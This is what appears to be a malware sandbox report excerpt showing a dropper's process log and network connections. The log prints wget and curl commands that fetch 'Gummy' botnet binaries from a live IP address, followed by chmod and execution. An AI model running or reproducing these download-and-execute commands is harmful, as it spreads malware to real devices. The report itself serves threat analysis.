/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.ppc]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.ppc]
/bin/cat
[cat Gummy.ppc]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.m68k]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.m68k]
/bin/cat
[cat Gummy.m68k]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
/usr/bin/wget
[wget http://45.95.168.234/bins/Gummy.sh4]
/usr/bin/curl
[curl -O http://45.95.168.234/bins/Gummy.sh4]
/bin/cat
[cat Gummy.sh4]
/bin/chmod
[chmod +x bd8bda2014609dc933e462e1d4bdf5cd_JaffaCakes118 SSH]
/tmp/SSH
[./SSH Gummy-SSH]
Network
| Country | Destination | Domain | Proto |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp | |
| HR | 45.95.168.234:80 | tcp |